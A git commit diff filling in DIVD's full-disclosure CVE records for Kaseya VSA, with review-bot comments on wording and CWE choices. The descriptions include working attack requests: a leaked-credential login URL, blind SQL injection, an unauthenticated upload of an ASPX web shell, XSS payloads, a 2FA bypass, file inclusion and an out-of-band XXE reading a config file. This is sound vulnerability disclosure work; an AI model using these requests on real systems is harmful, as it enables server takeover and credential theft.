Full disclosure Kaseya VSA

Frank Breedijk 2022-03-02 20:25:43 +01:00
parent f9c02b2e28
commit b0755f65aa
7 changed files with 130 additions and 107 deletions

View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (on premise)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021."
"value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.\n\nBy default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp\n\nWhen an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword\n\nThis Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9)\n\nThis request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.\n\nSecurity issues discovered\n---\n* Unauthenticated download page leaks credentials\n* Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents\n* dl.asp accepts credentials via a GET request\n* Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.\n\nImpact\n---\nVia the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. \n"
}
]
},
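
Review bot: The example dl.asp login URL in the new description value carries a concrete un= and pw= pair. If those values came from a real agent install rather than a throwaway lab instance, replace them with placeholders such as un=<Agent_Guid>&pw=<AgentPassword>; the text already names both fields, so nothing is lost. Two wording points in the same value: "When an attacker download a client" should read "downloads", and the last sentence ends with a stray space before the final \n.
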
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-200 Information Exposure"
}
]
}
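
Review bot: CWE-200 in the problemtype value is the broad information-exposure class, while the description added in this commit lists more specific weaknesses: agent credentials that work for services not intended for agents, and credentials accepted in a GET query string. Consider adding a second description entry, for example CWE-522 (Insufficiently Protected Credentials) or CWE-598 (Use of GET Request Method With Sensitive Query Strings), so the record can be filtered on the actual weakness.
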

View File

@ -1,22 +1,9 @@
{
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"generator": {
"engine": "Vulnogram 0.0.9"
},
"CVE_data_meta": {
"ID": "CVE-2021-30117",
"ASSIGNER": "cve@mitre.org",
"DATE_PUBLIC": "",
"TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6",
"AKA": "",
"STATE": "PUBLIC"
},
"source": {
"defect": [],
"advisory": "DIVD-2021-00011",
"discovery": "UNKNOWN"
"ID": "CVE-2021-30117",
"STATE": "PUBLIC",
"TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
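
Review bot: The TITLE kept in CVE_data_meta still reads "Authenticated SQL injection", but the description added further down in this file calls the issue semi-authenticated and the CVSS block has privilegesRequired set to NONE. The CVE-2021-30121 record in this same commit is retitled to "(Semi-)Authenticated"; do the same here, or raise privilegesRequired if a genuine login is needed.
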
@ -25,84 +12,104 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (on premise and SaaS)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
},
{
"product_name": "Kaseya VSA Agent",
"version": {
"version_data": [
{
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.0.23"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n<!DOCTYPE html>\n<HTML>\n \n<HEAD>\n \t<title>Whoops.</title>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n \n \n\t<link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link>\n \n----SNIP----\n```\n\nHowever when fldrId is set to (SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)) the request is allowed.\n\nRequest:\n```\nGET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 
1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 17:33:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 7960\n \n \n<html>\n<head>\n<title>Export Folder</title>\n<style>\n------ SNIP ----- \n```"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-89 SQL Injection"
}
]
}
]
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection exists in Kaseya VSA before 9.5.6."
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "MISC",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
]
},
"configuration": [],
"impact": {
"cvss": {
"version": "3.1",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
},
"exploit": [],
"work_around": [],
"solution": [],
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
}
]
}
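
Review bot: The second product_data entry, "Kaseya VSA Agent" below 9.5.0.23, is not explained anywhere in the description, which only covers the server endpoint /InstallTab/exportFldr.asp. Either state in the description why the agent is affected or drop the entry. In the description value, "The result should be a failure." follows the sentence about the cookie, so it is unclear which request it refers to; placing it directly before the 500 response would fix that. Unlike the other records in this commit, this one also has no "Security issues discovered" or "Impact" section.
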

View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (On-premise and SaaS)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
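
Review bot: version_data marks everything below 9.5.6 as affected, yet the description this commit replaces in the same file said "before 9.5.5" and the new text only names build 9.5.4.2149. Please confirm which release carries the fix and state it in the description. The product name is also cased "On-premise and SaaS" here but "on premise and SaaS" in the CVE-2021-30117 record; pick one form.
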
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.5 allows remote code execution."
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands\n\nThe api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands.\n\nDetailed description\n---\nGiven the following request:\n```\nPOST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1\nHost: 192.168.1.194\nCookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219\nContent-Length: 12\n\n<%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %>\n<%@ Import namespace=\"System.Web.UI.WebControls\" %>\n<%@ Import namespace=\"System.Diagnostics\" %>\n<%@ Import namespace=\"System.IO\" %>\n<%@ Import namespace=\"System\" %>\n<%@ Import namespace=\"System.Data\" %>\n<%@ Import namespace=\"System.Data.SqlClient\" %>\n<%@ Import namespace=\"System.Security.AccessControl\" %> \n<%@ Import namespace=\"System.Security.Principal\" %>\n<%@ Import namespace=\"System.Collections.Generic\" %> \n<%@ Import namespace=\"System.Collections\" %> \n \n<script runat=\"server\">\n \nprivate const string password = \"pass\"; // The password ( pass )\nprivate const string style = \"dark\"; // The style ( light / dark )\n \nprotected void Page_Load(object sender, EventArgs e)\n{\n\t//this.Remote(password);\n\tthis.Login(password);\n\tthis.Style(); \n\tthis.ServerInfo(); \n\t\n<snip>\n```\nThe attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter.\n\nEven though the call requires that a sessionId cookie is passed we have determined that the sessionId is 
not actually validated and any numeric value is accepted as valid.\n\nSecurity issues discovered\n---\n* a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication\n* /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access\n* The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file.\n\nImpact\n---\nThis arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.\n"
}
]
},
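
Review bot: The first two paragraphs of the new description value repeat the same sentence about uploading files with the privilege of the Web Server process; keep one of them. In the sample request, Content-Length: 12 does not match the body shown, and the text says the file name is controlled via qqfile while the request also sends Filename with the same value, so say which parameter the server actually uses. The uploaded page source adds nothing to the finding; a one-line placeholder body would keep the record short and readable.
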
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-434 Unrestricted Upload of File with Dangerous Type"
}
]
}
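
Review bot: The problemtype value lists only CWE-434, but the first item under "Security issues discovered" in the description is that the sessionId cookie is required and never validated. That authentication weakness is what makes the upload reachable without a login, so add a second description entry for it, for example CWE-287 (Improper Authentication).
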

View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk and Hidde Smit"
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Cross Site Scripting (XSS) exists in Kaseya VSA before 9.5.7."
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp\n\nThe parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack\n\nExample request:\n`https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>`\n\nThe same is true for the parameter FileName of /done.asp\n\nEaxmple request:\n`https://x.x.x.x/done.asp?FileName=\";</script><script>alert(1);a=\"&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`\n\n\n"
}
]
},
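
Review bot: The replaced description stated the fix boundary ("before 9.5.7"); the new value drops it, so the prose no longer says which versions are affected. Add that sentence back at the top. "Eaxmple request" is a typo for "Example request", and the value ends in three trailing \n that can be trimmed.
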
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-79 Cross-site Scripting (XSS)"
}
]
}
@ -101,6 +103,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}

View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,7 +33,7 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"data_format": "MITRE",
@ -41,7 +43,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA through 9.5.7 allows attackers to bypass the 2FA requirement."
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement.\n\nThe need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless.\n\nDetailed description\n---\nDuring the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.\n\n\n"
}
]
},
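
Review bot: The first sentence of the description changes "through 9.5.7" to "before 9.5.7", which moves 9.5.7 from affected to fixed. That matches the "<=" 9.5.6 in version_data, but it is a change of fact rather than wording, so please confirm it against the release that carries the fix. The response field is spelled both MFARequired and "MFARequered", and "MFAEnroled" looks misspelled as well; use the exact names from the server response. "in enforce client-side" should read "is enforced client-side".
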
@ -70,7 +72,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-305 Authentication Bypass by Primary Weakness"
}
]
}
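
Review bot: CWE-305 in the problemtype value records that authentication is bypassed, but the description attributes the bypass to the 2FA requirement being enforced client-side through a flag the client can alter. CWE-602 (Client-Side Enforcement of Server-Side Security) names that root cause; consider listing it alongside or instead of CWE-305.
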
@ -97,6 +99,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}

View File

@ -3,7 +3,7 @@
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30121",
"STATE": "PUBLIC",
"TITLE": "Authenticated local file inclusion in Kaseya VSA < v9.5.6"
"TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Authenticated local file inclusion in Kaseya VSA < v9.5.6"
"value": "Semi-authenticated local file inclusion\n\nThe contents of arbitrary files can be returned by the webserver\n\nExample request:\n`https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp`\n\nA valid sessionId is required but can be easily obtained via CVE-2021-30118\n"
}
]
},
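
Review bot: The last sentence of the new description says the sessionId "can be easily obtained via CVE-2021-30118", while the CVE-2021-30117 description in this same commit says the sessionId is obtained via CVE-2021-30116. Please check which identifier is meant and make the two records agree. The replaced text also carried the affected range ("< v9.5.6"), which the new value no longer mentions.
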
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-829 Inclusion of Functionality from Untrusted Control Sphere"
}
]
}
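
Review bot: CWE-829 in the problemtype value covers pulling in functionality from an untrusted source, but the description shows the server returning the contents of a file named by an absolute path in the path parameter. That is a file read driven by a user-controlled path, which CWE-22 (Path Traversal) or CWE-73 (External Control of File Name or Path) describes more closely. If the file is in fact executed rather than returned, the description should say so.
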

View File

@ -3,7 +3,7 @@
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201",
"STATE": "PUBLIC",
"TITLE": "Authenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6"
"TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,7 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -41,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6."
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker.\n\nDetailed description\n\nGiven the following request:\n```\nPOST /vsaWS/KaseyaWS.asmx HTTP/1.1\nContent-Type: text/xml;charset=UTF-8\nHost: 192.168.1.194:18081\nContent-Length: 406\n \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\">\n <soapenv:Header/>\n <soapenv:Body>\n <kas:PrimitiveResetPassword>\n <!--type: string-->\n <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"><data>&send;</data>]]>\n</kas:XmlRequest>\n </kas:PrimitiveResetPassword>\n </soapenv:Body>\n</soapenv:Envelope>\n```\n \nAnd the following XML file hosted at http://192.168.1.170/oob.dtd:\n```\n<!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\">\n<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\">\n%eval;\n%error;\n```\n\nThe server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below.\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/xml; charset=utf-8\nDate: Fri, 02 Apr 2021 10:07:38 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 2677\n \n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. 
---&gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '########################################################################\n# This is the configuration file for the KServer.\n# Place it in the same directory as the KServer executable\n# A blank line or new valid section header [] terminates each section.\n# Comment lines start with ; or #\n########################################################################\n<snip>\n```\n\nSecurity issues discovered\n---\n* The API insecurely resolves external XML entities\n* The API has an overly verbose error response\n\nImpact\n---\nUsing this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.\n\n"
}
]
},
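
Review bot: The sample request in the description loads the DTD from http://192.168.1.170:8080/oob.dtd, but the sentence that follows says the file is hosted at http://192.168.1.170/oob.dtd without the port; make the two match. The "Detailed description" heading lacks the "---" underline used for the other headings in this value and in the sibling records. In the prose sentence the path is written with four backslashes per separator, which decodes to doubled backslashes, and "it will read the file ... and returns the content" should read "return".
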
@ -70,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-611 Improper Restriction of XML External Entity Reference ('XXE')"
}
]
}
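
Review bot: The problemtype value lists only CWE-611, while "Security issues discovered" in the description also names the overly verbose error response, which is the channel the file contents come back through. Consider adding CWE-209 (Generation of Error Message Containing Sensitive Information) as a second description entry.
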
@ -102,6 +108,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}